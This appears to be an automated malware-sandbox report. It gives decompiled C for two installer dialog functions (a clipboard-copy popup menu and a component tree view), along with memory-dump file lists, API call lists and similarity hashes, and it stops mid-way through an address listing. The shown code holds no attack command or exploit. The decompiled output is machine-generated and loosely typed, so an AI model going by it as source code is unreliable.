                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FilePointer
                                                                        • String ID:
                                                                        • API String ID: 973152223-0
                                                                        • Opcode ID: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                                                        • Instruction ID: 25801f27feaadc63e0c23ae6d5f917682d27e8bc7d9ad1472eb802ffa7caf717
                                                                        • Opcode Fuzzy Hash: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                                                        • Instruction Fuzzy Hash: E4B01232954300BFDA114B00DE05F057B72B758700F208030B340380F0C2712420DB0D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        C-Code - Quality: 89%
                                                                        			E00404EA0(long _a4, long _a8, long _a12, unsigned int _a16) {
                                                                        				struct HWND__* _v8;
                                                                        				struct tagRECT _v24;
                                                                        				void* _v32;
                                                                        				signed int _v36;
                                                                        				int _v40;
                                                                        				CHAR* _v44;
                                                                        				signed int _v48;
                                                                        				int _v52;
                                                                        				void* _v56;
                                                                        				void* _v64;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				long _t86;
                                                                        				struct HMENU__* _t88;
                                                                        				unsigned int _t91;
                                                                        				int _t93;
                                                                        				int _t94;
                                                                        				void* _t100;
                                                                        				intOrPtr _t123;
                                                                        				struct HWND__* _t127;
                                                                        				int _t148;
                                                                        				int _t149;
                                                                        				struct HWND__* _t153;
                                                                        				struct HWND__* _t157;
                                                                        				struct HMENU__* _t159;
                                                                        				long _t161;
                                                                        				CHAR* _t162;
                                                                        				CHAR* _t163;
                                                                        
                                                                        				_t153 =  *0x7a2764;
                                                                        				_t148 = 0;
                                                                        				_v8 = _t153;
                                                                        				if(_a8 != 0x110) {
                                                                        					if(_a8 == 0x405) {
                                                                        						CloseHandle(CreateThread(0, 0, E00404E34, GetDlgItem(_a4, 0x3ec), 0,  &_a4));
                                                                        					}
                                                                        					if(_a8 != 0x111) {
                                                                        						L16:
                                                                        						if(_a8 != 0x404) {
                                                                        							L24:
                                                                        							if(_a8 != 0x7b || _a12 != _t153) {
                                                                        								goto L19;
                                                                        							} else {
                                                                        								_t86 = SendMessageA(_t153, 0x1004, _t148, _t148);
                                                                        								_a8 = _t86;
                                                                        								if(_t86 <= _t148) {
                                                                        									L36:
                                                                        									return 0;
                                                                        								}
                                                                        								_t88 = CreatePopupMenu();
                                                                        								_push(0xffffffe1);
                                                                        								_push(_t148);
                                                                        								_t159 = _t88;
                                                                        								AppendMenuA(_t159, _t148, 1, E004059E1(_t148, _t153, _t159));
                                                                        								_t91 = _a16;
                                                                        								if(_t91 != 0xffffffff) {
                                                                        									_t149 = _t91;
                                                                        									_t93 = _t91 >> 0x10;
                                                                        								} else {
                                                                        									GetWindowRect(_t153,  &_v24);
                                                                        									_t149 = _v24.left;
                                                                        									_t93 = _v24.top;
                                                                        								}
                                                                        								_t94 = TrackPopupMenu(_t159, 0x180, _t149, _t93, _t148, _t153, _t148);
                                                                        								_t161 = 1;
                                                                        								if(_t94 == 1) {
                                                                        									_v56 = _t148;
                                                                        									_v44 = 0x79f580;
                                                                        									_v40 = 0xfff;
                                                                        									_a4 = _a8;
                                                                        									do {
                                                                        										_a4 = _a4 - 1;
                                                                        										_t161 = _t161 + SendMessageA(_v8, 0x102d, _a4,  &_v64) + 2;
                                                                        									} while (_a4 != _t148);
                                                                        									OpenClipboard(_t148);
                                                                        									EmptyClipboard();
                                                                        									_t100 = GlobalAlloc(0x42, _t161);
                                                                        									_a4 = _t100;
                                                                        									_t162 = GlobalLock(_t100);
                                                                        									do {
                                                                        										_v44 = _t162;
                                                                        										SendMessageA(_v8, 0x102d, _t148,  &_v64);
                                                                        										_t163 =  &(_t162[lstrlenA(_t162)]);
                                                                        										 *_t163 = 0xa0d;
                                                                        										_t162 =  &(_t163[2]);
                                                                        										_t148 = _t148 + 1;
                                                                        									} while (_t148 < _a8);
                                                                        									GlobalUnlock(_a4);
                                                                        									SetClipboardData(1, _a4);
                                                                        									CloseClipboard();
                                                                        								}
                                                                        								goto L36;
                                                                        							}
                                                                        						}
                                                                        						if( *0x7a274c == _t148) {
                                                                        							ShowWindow( *0x7a2f84, 8);
                                                                        							if( *0x7a300c == _t148) {
                                                                        								E00404D62( *((intOrPtr*)( *0x79ed58 + 0x34)), _t148);
                                                                        							}
                                                                        							E00403D80(1);
                                                                        							goto L24;
                                                                        						}
                                                                        						 *0x79e950 = 2;
                                                                        						E00403D80(0x78);
                                                                        						goto L19;
                                                                        					} else {
                                                                        						if(_a12 != 0x403) {
                                                                        							L19:
                                                                        							return E00403E0E(_a8, _a12, _a16);
                                                                        						}
                                                                        						ShowWindow( *0x7a2750, _t148);
                                                                        						ShowWindow(_t153, 8);
                                                                        						E0040417A();
                                                                        						goto L16;
                                                                        					}
                                                                        				}
                                                                        				_v48 = _v48 | 0xffffffff;
                                                                        				_v36 = _v36 | 0xffffffff;
                                                                        				_v56 = 2;
                                                                        				_v52 = 0;
                                                                        				_v44 = 0;
                                                                        				_v40 = 0;
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				_t123 =  *0x7a2f88;
                                                                        				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                                                                        				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                                                                        				 *0x7a2750 = GetDlgItem(_a4, 0x403);
                                                                        				 *0x7a2748 = GetDlgItem(_a4, 0x3ee);
                                                                        				_t127 = GetDlgItem(_a4, 0x3f8);
                                                                        				 *0x7a2764 = _t127;
                                                                        				_v8 = _t127;
                                                                        				E00403DDC( *0x7a2750);
                                                                        				 *0x7a2754 = E004045FA(4);
                                                                        				 *0x7a276c = 0;
                                                                        				GetClientRect(_v8,  &_v24);
                                                                        				_v48 = _v24.right - GetSystemMetrics(0x15);
                                                                        				SendMessageA(_v8, 0x101b, 0,  &_v56);
                                                                        				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                                                        				if(_a8 >= 0) {
                                                                        					SendMessageA(_v8, 0x1001, 0, _a8);
                                                                        					SendMessageA(_v8, 0x1026, 0, _a8);
                                                                        				}
                                                                        				if(_a12 >= _t148) {
                                                                        					SendMessageA(_v8, 0x1024, _t148, _a12);
                                                                        				}
                                                                        				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                        				_push(0x1b);
                                                                        				E00403DA7(_a4);
                                                                        				if(( *0x7a2f90 & 0x00000003) != 0) {
                                                                        					ShowWindow( *0x7a2750, _t148);
                                                                        					if(( *0x7a2f90 & 0x00000002) != 0) {
                                                                        						 *0x7a2750 = _t148;
                                                                        					} else {
                                                                        						ShowWindow(_v8, 8);
                                                                        					}
                                                                        				}
                                                                        				_t157 = GetDlgItem(_a4, 0x3ec);
                                                                        				SendMessageA(_t157, 0x401, _t148, 0x75300000);
                                                                        				if(( *0x7a2f90 & 0x00000004) != 0) {
                                                                        					SendMessageA(_t157, 0x409, _t148, _a12);
                                                                        					SendMessageA(_t157, 0x2001, _t148, _a8);
                                                                        				}
                                                                        				goto L36;
                                                                        			}
































                                                                        0x00404ea9
                                                                        0x00404eaf
                                                                        0x00404eb8
                                                                        0x00404ebb
                                                                        0x00405048
                                                                        0x0040506c
                                                                        0x0040506c
                                                                        0x0040507f
                                                                        0x0040509c
                                                                        0x004050a3
                                                                        0x004050fa
                                                                        0x004050fe
                                                                        0x00000000
                                                                        0x00405105
                                                                        0x0040510d
                                                                        0x00405115
                                                                        0x00405118
                                                                        0x00405215
                                                                        0x00000000
                                                                        0x00405215
                                                                        0x0040511e
                                                                        0x00405124
                                                                        0x00405126
                                                                        0x00405127
                                                                        0x00405133
                                                                        0x00405139
                                                                        0x0040513f
                                                                        0x00405154
                                                                        0x0040515a
                                                                        0x00405141
                                                                        0x00405146
                                                                        0x0040514c
                                                                        0x0040514f
                                                                        0x0040514f
                                                                        0x00405168
                                                                        0x00405170
                                                                        0x00405173
                                                                        0x0040517c
                                                                        0x0040517f
                                                                        0x00405186
                                                                        0x0040518d
                                                                        0x00405195
                                                                        0x00405195
                                                                        0x004051ac
                                                                        0x004051ac
                                                                        0x004051b3
                                                                        0x004051b9
                                                                        0x004051c2
                                                                        0x004051c9
                                                                        0x004051d2
                                                                        0x004051d4
                                                                        0x004051d7
                                                                        0x004051e0
                                                                        0x004051ec
                                                                        0x004051ee
                                                                        0x004051f4
                                                                        0x004051f5
                                                                        0x004051f6
                                                                        0x004051fe
                                                                        0x00405209
                                                                        0x0040520f
                                                                        0x0040520f
                                                                        0x00000000
                                                                        0x00405173
                                                                        0x004050fe
                                                                        0x004050ab
                                                                        0x004050db
                                                                        0x004050e3
                                                                        0x004050ee
                                                                        0x004050ee
                                                                        0x004050f5
                                                                        0x00000000
                                                                        0x004050f5
                                                                        0x004050af
                                                                        0x004050b9
                                                                        0x00000000
                                                                        0x00405081
                                                                        0x00405087
                                                                        0x004050be
                                                                        0x00000000
                                                                        0x004050c7
                                                                        0x00405090
                                                                        0x00405095
                                                                        0x00405097
                                                                        0x00000000
                                                                        0x00405097
                                                                        0x0040507f
                                                                        0x00404ec1
                                                                        0x00404ec5
                                                                        0x00404ece
                                                                        0x00404ed5
                                                                        0x00404ed8
                                                                        0x00404edb
                                                                        0x00404ede
                                                                        0x00404edf
                                                                        0x00404ee0
                                                                        0x00404ef9
                                                                        0x00404efc
                                                                        0x00404f06
                                                                        0x00404f15
                                                                        0x00404f1d
                                                                        0x00404f25
                                                                        0x00404f2a
                                                                        0x00404f2d
                                                                        0x00404f39
                                                                        0x00404f42
                                                                        0x00404f4b
                                                                        0x00404f6e
                                                                        0x00404f74
                                                                        0x00404f85
                                                                        0x00404f8a
                                                                        0x00404f98
                                                                        0x00404fa6
                                                                        0x00404fa6
                                                                        0x00404fab
                                                                        0x00404fb9
                                                                        0x00404fb9
                                                                        0x00404fbe
                                                                        0x00404fc1
                                                                        0x00404fc6
                                                                        0x00404fd2
                                                                        0x00404fdb
                                                                        0x00404fe8
                                                                        0x00404ff7
                                                                        0x00404fea
                                                                        0x00404fef
                                                                        0x00404fef
                                                                        0x00404fe8
                                                                        0x0040500c
                                                                        0x00405015
                                                                        0x0040501e
                                                                        0x0040502e
                                                                        0x0040503a
                                                                        0x0040503a
                                                                        0x00000000

                                                                        APIs
                                                                        • GetDlgItem.USER32 ref: 00404EFF
                                                                        • GetDlgItem.USER32 ref: 00404F0E
                                                                        • GetDlgItem.USER32 ref: 00404F1D
                                                                          • Part of subcall function 00403DDC: SendMessageA.USER32(00000028,?,00000001,00403C0F), ref: 00403DEA
                                                                        • GetClientRect.USER32 ref: 00404F4B
                                                                        • GetSystemMetrics.USER32 ref: 00404F53
                                                                        • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F74
                                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404F85
                                                                        • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404F98
                                                                        • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404FA6
                                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404FB9
                                                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404FDB
                                                                        • ShowWindow.USER32(?,00000008), ref: 00404FEF
                                                                        • GetDlgItem.USER32 ref: 00405005
                                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405015
                                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040502E
                                                                        • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 0040503A
                                                                        • GetDlgItem.USER32 ref: 00405057
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00004E34,00000000), ref: 00405065
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040506C
                                                                        • ShowWindow.USER32(00000000), ref: 00405090
                                                                        • ShowWindow.USER32(?,00000008), ref: 00405095
                                                                        • ShowWindow.USER32(00000008), ref: 004050DB
                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040510D
                                                                        • CreatePopupMenu.USER32 ref: 0040511E
                                                                        • AppendMenuA.USER32 ref: 00405133
                                                                        • GetWindowRect.USER32 ref: 00405146
                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405168
                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051A3
                                                                        • OpenClipboard.USER32(00000000), ref: 004051B3
                                                                        • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004051B9
                                                                        • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004051C2
                                                                        • GlobalLock.KERNEL32 ref: 004051CC
                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051E0
                                                                        • lstrlenA.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004051E7
                                                                        • GlobalUnlock.KERNEL32(00000000,00000000,?,?,00000000,?,00000000), ref: 004051FE
                                                                        • SetClipboardData.USER32 ref: 00405209
                                                                        • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 0040520F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrlen
                                                                        • String ID: {
                                                                        • API String ID: 1050754034-366298937
                                                                        • Opcode ID: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
                                                                        • Instruction ID: 09b722d0185256cc624264d40bb0edb6627bdfa233c056c1d5ba82df3b217a72
                                                                        • Opcode Fuzzy Hash: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
                                                                        • Instruction Fuzzy Hash: 0FA14B70900208FFDB11AF64DD89AAE7F79FB48354F10812AFA05BA1A1C7785E41DF69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E004046A7(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                                                                        				struct HWND__* _v8;
                                                                        				struct HWND__* _v12;
                                                                        				signed int _v16;
                                                                        				intOrPtr _v20;
                                                                        				struct HBITMAP__* _v24;
                                                                        				long _v28;
                                                                        				int _v32;
                                                                        				signed int _v40;
                                                                        				int _v44;
                                                                        				signed int* _v56;
                                                                        				intOrPtr _v60;
                                                                        				signed int _v64;
                                                                        				long _v68;
                                                                        				void* _v72;
                                                                        				intOrPtr _v76;
                                                                        				intOrPtr _v80;
                                                                        				void* _v84;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				struct HWND__* _t182;
                                                                        				int _t196;
                                                                        				long _t202;
                                                                        				signed int _t206;
                                                                        				signed int _t217;
                                                                        				void* _t220;
                                                                        				void* _t221;
                                                                        				int _t227;
                                                                        				signed int _t232;
                                                                        				signed int _t233;
                                                                        				signed int _t240;
                                                                        				void* _t252;
                                                                        				intOrPtr _t258;
                                                                        				char* _t268;
                                                                        				signed char _t269;
                                                                        				long _t274;
                                                                        				int _t280;
                                                                        				signed int* _t281;
                                                                        				int _t282;
                                                                        				long _t283;
                                                                        				int _t285;
                                                                        				long _t286;
                                                                        				signed int _t287;
                                                                        				long _t288;
                                                                        				signed int _t291;
                                                                        				signed int _t298;
                                                                        				signed int _t300;
                                                                        				signed int _t302;
                                                                        				int* _t310;
                                                                        				void* _t311;
                                                                        				int _t315;
                                                                        				int _t316;
                                                                        				int _t317;
                                                                        				signed int _t318;
                                                                        				void* _t320;
                                                                        
                                                                        				_v12 = GetDlgItem(_a4, 0x3f9);
                                                                        				_t182 = GetDlgItem(_a4, 0x408);
                                                                        				_t280 =  *0x7a2fa8;
                                                                        				_t320 = SendMessageA;
                                                                        				_v8 = _t182;
                                                                        				_t315 = 0;
                                                                        				_v32 = _t280;
                                                                        				_v20 =  *0x7a2f88 + 0x94;
                                                                        				if(_a8 != 0x110) {
                                                                        					L23:
                                                                        					if(_a8 != 0x405) {
                                                                        						_t289 = _a16;
                                                                        					} else {
                                                                        						_a12 = _t315;
                                                                        						_t289 = 1;
                                                                        						_a8 = 0x40f;
                                                                        						_a16 = 1;
                                                                        					}
                                                                        					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                        						_v16 = _t289;
                                                                        						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
                                                                        							if(( *0x7a2f91 & 0x00000002) != 0) {
                                                                        								L41:
                                                                        								if(_v16 != _t315) {
                                                                        									_t232 = _v16;
                                                                        									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                                                                        										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                                                                        									}
                                                                        									_t233 = _v16;
                                                                        									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                                                                        										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                                                                        											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
                                                                        										} else {
                                                                        											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								goto L48;
                                                                        							}
                                                                        							if(_a8 == 0x413) {
                                                                        								L33:
                                                                        								_t289 = 0 | _a8 != 0x00000413;
                                                                        								_t240 = E00404627(_v8, _a8 != 0x413);
                                                                        								if(_t240 >= _t315) {
                                                                        									_t93 = _t280 + 8; // 0x8
                                                                        									_t310 = _t240 * 0x418 + _t93;
                                                                        									_t289 =  *_t310;
                                                                        									if((_t289 & 0x00000010) == 0) {
                                                                        										if((_t289 & 0x00000040) == 0) {
                                                                        											_t298 = _t289 ^ 0x00000001;
                                                                        										} else {
                                                                        											_t300 = _t289 ^ 0x00000080;
                                                                        											if(_t300 >= 0) {
                                                                        												_t298 = _t300 & 0xfffffffe;
                                                                        											} else {
                                                                        												_t298 = _t300 | 0x00000001;
                                                                        											}
                                                                        										}
                                                                        										 *_t310 = _t298;
                                                                        										E0040117D(_t240);
                                                                        										_t289 = 1;
                                                                        										_a8 = 0x40f;
                                                                        										_a12 = 1;
                                                                        										_a16 =  !( *0x7a2f90) >> 0x00000008 & 1;
                                                                        									}
                                                                        								}
                                                                        								goto L41;
                                                                        							}
                                                                        							_t289 = _a16;
                                                                        							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                        								goto L41;
                                                                        							}
                                                                        							goto L33;
                                                                        						} else {
                                                                        							goto L48;
                                                                        						}
                                                                        					} else {
                                                                        						L48:
                                                                        						if(_a8 != 0x111) {
                                                                        							L56:
                                                                        							if(_a8 == 0x200) {
                                                                        								SendMessageA(_v8, 0x200, _t315, _t315);
                                                                        							}
                                                                        							if(_a8 == 0x40b) {
                                                                        								_t220 =  *0x79f564;
                                                                        								if(_t220 != _t315) {
                                                                        									ImageList_Destroy(_t220);
                                                                        								}
                                                                        								_t221 =  *0x79f578;
                                                                        								if(_t221 != _t315) {
                                                                        									GlobalFree(_t221);
                                                                        								}
                                                                        								 *0x79f564 = _t315;
                                                                        								 *0x79f578 = _t315;
                                                                        								 *0x7a2fe0 = _t315;
                                                                        							}
                                                                        							if(_a8 != 0x40f) {
                                                                        								L86:
                                                                        								if(_a8 == 0x420 && ( *0x7a2f91 & 0x00000001) != 0) {
                                                                        									_t316 = (0 | _a16 == 0x00000020) << 3;
                                                                        									ShowWindow(_v8, _t316);
                                                                        									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                                                                        								}
                                                                        								goto L89;
                                                                        							} else {
                                                                        								E004011EF(_t289, _t315, _t315);
                                                                        								if(_a12 != _t315) {
                                                                        									E00401410(8);
                                                                        								}
                                                                        								if(_a16 == _t315) {
                                                                        									L73:
                                                                        									E004011EF(_t289, _t315, _t315);
                                                                        									_v32 =  *0x79f578;
                                                                        									_t196 =  *0x7a2fa8;
                                                                        									_v60 = 0xf030;
                                                                        									_v16 = _t315;
                                                                        									if( *0x7a2fac <= _t315) {
                                                                        										L84:
                                                                        										InvalidateRect(_v8, _t315, 1);
                                                                        										if( *((intOrPtr*)( *0x7a275c + 0x10)) != _t315) {
                                                                        											E00404545(0x3ff, 0xfffffffb, E004045FA(5));
                                                                        										}
                                                                        										goto L86;
                                                                        									}
                                                                        									_t281 = _t196 + 8;
                                                                        									do {
                                                                        										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                                                                        										if(_t202 != _t315) {
                                                                        											_t291 =  *_t281;
                                                                        											_v68 = _t202;
                                                                        											_v72 = 8;
                                                                        											if((_t291 & 0x00000001) != 0) {
                                                                        												_v72 = 9;
                                                                        												_v56 =  &(_t281[4]);
                                                                        												_t281[0] = _t281[0] & 0x000000fe;
                                                                        											}
                                                                        											if((_t291 & 0x00000040) == 0) {
                                                                        												_t206 = (_t291 & 0x00000001) + 1;
                                                                        												if((_t291 & 0x00000010) != 0) {
                                                                        													_t206 = _t206 + 3;
                                                                        												}
                                                                        											} else {
                                                                        												_t206 = 3;
                                                                        											}
                                                                        											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                                                                        											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
                                                                        											SendMessageA(_v8, 0x110d, _t315,  &_v72);
                                                                        										}
                                                                        										_v16 = _v16 + 1;
                                                                        										_t281 =  &(_t281[0x106]);
                                                                        									} while (_v16 <  *0x7a2fac);
                                                                        									goto L84;
                                                                        								} else {
                                                                        									_t282 = E004012E2( *0x79f578);
                                                                        									E00401299(_t282);
                                                                        									_t217 = 0;
                                                                        									_t289 = 0;
                                                                        									if(_t282 <= _t315) {
                                                                        										L72:
                                                                        										SendMessageA(_v12, 0x14e, _t289, _t315);
                                                                        										_a16 = _t282;
                                                                        										_a8 = 0x420;
                                                                        										goto L73;
                                                                        									} else {
                                                                        										goto L69;
                                                                        									}
                                                                        									do {
                                                                        										L69:
                                                                        										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
                                                                        											_t289 = _t289 + 1;
                                                                        										}
                                                                        										_t217 = _t217 + 1;
                                                                        									} while (_t217 < _t282);
                                                                        									goto L72;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                        							goto L89;
                                                                        						} else {
                                                                        							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                                                                        							if(_t227 == 0xffffffff) {
                                                                        								goto L89;
                                                                        							}
                                                                        							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                                                                        							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
                                                                        								_t283 = 0x20;
                                                                        							}
                                                                        							E00401299(_t283);
                                                                        							SendMessageA(_a4, 0x420, _t315, _t283);
                                                                        							_a12 = 1;
                                                                        							_a16 = _t315;
                                                                        							_a8 = 0x40f;
                                                                        							goto L56;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					 *0x7a2fe0 = _a4;
                                                                        					_t285 = 2;
                                                                        					_v28 = 0;
                                                                        					_v16 = _t285;
                                                                        					 *0x79f578 = GlobalAlloc(0x40,  *0x7a2fac << 2);
                                                                        					_v24 = LoadBitmapA( *0x7a2f80, 0x6e);
                                                                        					 *0x79f574 = SetWindowLongA(_v8, 0xfffffffc, E00404CA1);
                                                                        					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                        					 *0x79f564 = _t252;
                                                                        					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                                                                        					SendMessageA(_v8, 0x1109, _t285,  *0x79f564);
                                                                        					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                                                        						SendMessageA(_v8, 0x111b, 0x10, 0);
                                                                        					}
                                                                        					DeleteObject(_v24);
                                                                        					_t286 = 0;
                                                                        					do {
                                                                        						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                                                                        						if(_t258 != _t315) {
                                                                        							if(_t286 != 0x20) {
                                                                        								_v16 = _t315;
                                                                        							}
                                                                        							_push(_t258);
                                                                        							_push(_t315);
                                                                        							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E004059E1(_t286, _t315, _t320)), _t286);
                                                                        						}
                                                                        						_t286 = _t286 + 1;
                                                                        					} while (_t286 < 0x21);
                                                                        					_t317 = _a16;
                                                                        					_t287 = _v16;
                                                                        					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                                                                        					_push(0x15);
                                                                        					E00403DA7(_a4);
                                                                        					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                                                                        					_push(0x16);
                                                                        					E00403DA7(_a4);
                                                                        					_t318 = 0;
                                                                        					_t288 = 0;
                                                                        					if( *0x7a2fac <= 0) {
                                                                        						L19:
                                                                        						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                                        						goto L20;
                                                                        					} else {
                                                                        						_t311 = _v32 + 8;
                                                                        						_v24 = _t311;
                                                                        						do {
                                                                        							_t268 = _t311 + 0x10;
                                                                        							if( *_t268 != 0) {
                                                                        								_v60 = _t268;
                                                                        								_t269 =  *_t311;
                                                                        								_t302 = 0x20;
                                                                        								_v84 = _t288;
                                                                        								_v80 = 0xffff0002;
                                                                        								_v76 = 0xd;
                                                                        								_v64 = _t302;
                                                                        								_v40 = _t318;
                                                                        								_v68 = _t269 & _t302;
                                                                        								if((_t269 & 0x00000002) == 0) {
                                                                        									if((_t269 & 0x00000004) == 0) {
                                                                        										 *( *0x79f578 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                        									} else {
                                                                        										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                                                                        									}
                                                                        								} else {
                                                                        									_v76 = 0x4d;
                                                                        									_v44 = 1;
                                                                        									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                        									_v28 = 1;
                                                                        									 *( *0x79f578 + _t318 * 4) = _t274;
                                                                        									_t288 =  *( *0x79f578 + _t318 * 4);
                                                                        								}
                                                                        							}
                                                                        							_t318 = _t318 + 1;
                                                                        							_t311 = _v24 + 0x418;
                                                                        							_v24 = _t311;
                                                                        						} while (_t318 <  *0x7a2fac);
                                                                        						if(_v28 != 0) {
                                                                        							L20:
                                                                        							if(_v16 != 0) {
                                                                        								E00403DDC(_v8);
                                                                        								_t280 = _v32;
                                                                        								_t315 = 0;
                                                                        								goto L23;
                                                                        							} else {
                                                                        								ShowWindow(_v12, 5);
                                                                        								E00403DDC(_v12);
                                                                        								L89:
                                                                        								return E00403E0E(_a8, _a12, _a16);
                                                                        							}
                                                                        						}
                                                                        						goto L19;
                                                                        					}
                                                                        				}
                                                                        			}


























































                                                                        0x004046c5
                                                                        0x004046cb
                                                                        0x004046cd
                                                                        0x004046d3
                                                                        0x004046d9
                                                                        0x004046e6
                                                                        0x004046ef
                                                                        0x004046f2
                                                                        0x004046f5
                                                                        0x00404916
                                                                        0x0040491d
                                                                        0x00404931
                                                                        0x0040491f
                                                                        0x00404921
                                                                        0x00404924
                                                                        0x00404925
                                                                        0x0040492c
                                                                        0x0040492c
                                                                        0x0040493d
                                                                        0x0040494b
                                                                        0x0040494e
                                                                        0x00404964
                                                                        0x004049dc
                                                                        0x004049df
                                                                        0x004049e1
                                                                        0x004049eb
                                                                        0x004049f9
                                                                        0x004049f9
                                                                        0x004049fb
                                                                        0x00404a05
                                                                        0x00404a0b
                                                                        0x00404a2c
                                                                        0x00404a0d
                                                                        0x00404a1a
                                                                        0x00404a1a
                                                                        0x00404a0b
                                                                        0x00404a05
                                                                        0x00000000
                                                                        0x004049df
                                                                        0x00404969
                                                                        0x00404974
                                                                        0x00404979
